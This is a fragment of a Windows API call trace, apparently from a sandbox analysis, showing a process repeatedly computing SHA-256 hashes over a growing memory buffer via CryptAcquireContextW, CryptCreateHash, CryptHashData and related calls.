	[0102.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246fe8
	[0102.132] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246fe8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246fe8, pdwDataLen=0x12941c) returned 1
	[0102.132] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.132] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.132] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.132] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.132] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0102.132] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247010
	[0102.132] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247010, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247010, pdwDataLen=0x12941c) returned 1
	[0102.132] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.132] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.132] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.132] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.132] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0102.132] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247038
	[0102.133] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247038, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247038, pdwDataLen=0x12941c) returned 1
	[0102.133] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.133] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.133] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.133] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.133] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0102.133] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247060
	[0102.133] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247060, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247060, pdwDataLen=0x12941c) returned 1
	[0102.133] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.133] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.133] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.133] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.133] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0102.133] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247088
	[0102.133] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247088, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247088, pdwDataLen=0x12941c) returned 1
	[0102.134] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.134] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.134] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.134] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.134] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0102.134] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2470b0
	[0102.134] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2470b0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2470b0, pdwDataLen=0x12941c) returned 1
	[0102.134] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.134] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.134] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.134] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.135] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0102.135] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2470d8
	[0102.135] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2470d8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2470d8, pdwDataLen=0x12941c) returned 1
	[0102.135] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.135] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.135] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.135] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.135] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0102.135] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247100
	[0102.135] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247100, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247100, pdwDataLen=0x12941c) returned 1
	[0102.135] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.135] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.135] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.135] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.135] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0102.136] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247128
	[0102.136] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247128, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247128, pdwDataLen=0x12941c) returned 1
	[0102.136] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.136] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.136] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.136] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.136] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0102.136] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247150
	[0102.136] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247150, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247150, pdwDataLen=0x12941c) returned 1
	[0102.136] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.136] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.136] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.136] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.136] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0102.136] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2471a8
	[0102.137] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2471a8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2471a8, pdwDataLen=0x12941c) returned 1
	[0102.137] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.137] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.137] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.137] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.137] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0102.137] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2471d0
	[0102.137] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2471d0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2471d0, pdwDataLen=0x12941c) returned 1
	[0102.137] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.137] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.137] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.137] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.137] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0102.137] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2471f8
	[0102.138] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2471f8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2471f8, pdwDataLen=0x12941c) returned 1
	[0102.138] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.138] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.138] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.138] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.138] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0102.138] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247220
	[0102.138] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247220, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247220, pdwDataLen=0x12941c) returned 1
	[0102.138] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.138] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.138] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.138] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.138] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0102.138] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247248
	[0102.139] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247248, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247248, pdwDataLen=0x12941c) returned 1
	[0102.139] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.139] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.139] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.139] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.139] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0102.139] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247270
	[0102.139] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247270, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247270, pdwDataLen=0x12941c) returned 1
	[0102.139] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.139] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.139] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.139] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.139] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0102.139] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247298
	[0102.140] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247298, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247298, pdwDataLen=0x12941c) returned 1
	[0102.140] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.140] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.140] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.140] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.140] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0102.140] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2472c0
	[0102.140] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2472c0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2472c0, pdwDataLen=0x12941c) returned 1
	[0102.140] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.140] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.140] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.140] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.141] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0102.141] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2472e8
	[0102.141] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2472e8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2472e8, pdwDataLen=0x12941c) returned 1
	[0102.141] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.141] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.141] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.141] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.141] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0102.141] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247310
	[0102.141] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247310, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247310, pdwDataLen=0x12941c) returned 1
	[0102.141] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.141] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.141] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.142] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.142] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0102.142] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247338
	[0102.142] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247338, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247338, pdwDataLen=0x12941c) returned 1
	[0102.142] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.142] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.142] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.142] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.142] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0102.142] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247360
	[0102.142] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247360, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247360, pdwDataLen=0x12941c) returned 1
	[0102.142] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.142] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.142] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.143] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.143] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0102.143] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247388
	[0102.143] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247388, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247388, pdwDataLen=0x12941c) returned 1
	[0102.143] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.143] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.143] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.143] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.143] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0102.143] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2473b0
	[0102.143] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2473b0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2473b0, pdwDataLen=0x12941c) returned 1
	[0102.143] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.143] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.143] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.144] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.144] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0102.144] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2473d8
	[0102.144] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2473d8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2473d8, pdwDataLen=0x12941c) returned 1
	[0102.144] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.144] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.144] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.144] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.144] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0102.144] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247400
	[0102.144] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247400, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247400, pdwDataLen=0x12941c) returned 1
	[0102.144] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.144] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.144] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.145] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.145] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0102.145] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247428
